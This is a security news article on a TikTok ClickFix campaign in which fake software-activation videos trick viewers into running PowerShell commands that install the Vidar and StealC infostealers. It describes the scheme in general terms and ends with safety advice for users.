Recently, TikTok has increasingly attracted the attention of cybercriminals who are exploiting the platform to disseminate various malicious software. A particularly insidious campaign has emerged, promoting fake instructional videos designed to trick unsuspecting users into downloading infostealers onto their devices through a method known as ClickFix attacks.

This tactic, as detailed in Trend Micro and highlighted by Bleeping Computer, encourages viewers to execute commands that supposedly enable premium features in software such as Windows, Microsoft Office, CapCut, and Spotify. For example, one popular video claims, “Boost Your Spotify Experience Instantly — Here’s How!” and it has amassed nearly 500,000 views.

While the programs discussed in these videos are indeed legitimate, the activation methods are merely facades designed to lead users towards unwittingly infecting their devices with malicious software like Vidar and StealC.

TikTok’s algorithm, which emphasizes high engagement, facilitates the rapid spread of such harmful content. Previously, cyber criminals have utilized trending challenges, like the “Invisible Challenge,” to propagate WASP Stealer malware capable of stealing Discord accounts, passwords, credit card details, and cryptocurrency wallets. In another notorious scheme, fake cryptocurrency giveaways featuring deepfakes of figures such as Elon Musk have deceived users into investing “activation” fees in Bitcoin.

ClickFix represents a social engineering strategy that capitalizes on fabricated error messages or CAPTCHA prompts, aiming to mislead individuals into executing commands containing harmful code. Users may encounter pop-up alerts claiming there is a technical issue, along with instructions to copy a command (often a PowerShell script) to “resolve” it. This type of attack primarily targets Windows systems, though macOS and Linux are not immune either.

Current TikTok videos in this campaign encourage users to run a PowerShell command, thereby installing Vidar or StealC malware. Vidar is capable of capturing desktop screenshots and extracting a wide array of data, including login details, cookies, credit cards, and crypto wallet information, while StealC zeroes in on web browsers and crypto wallets. Following execution, the script downloads another PowerShell script that allows it to launch automatically during device startup, concealing itself in hidden directories and purging temporary folders to escape detection.

Exercise caution when engaging with instructional content on TikTok, especially unsolicited technical videos. Verify the source and favor legitimate providers, such as official developers. Additionally, be vigilant for signs of AI-generated material, which can disseminate malware rapidly and broadly. Notably, these misleading videos do not embed or deliver malicious code directly; instead, they rely on social engineering techniques through verbal instructions, making them notably harder to identify.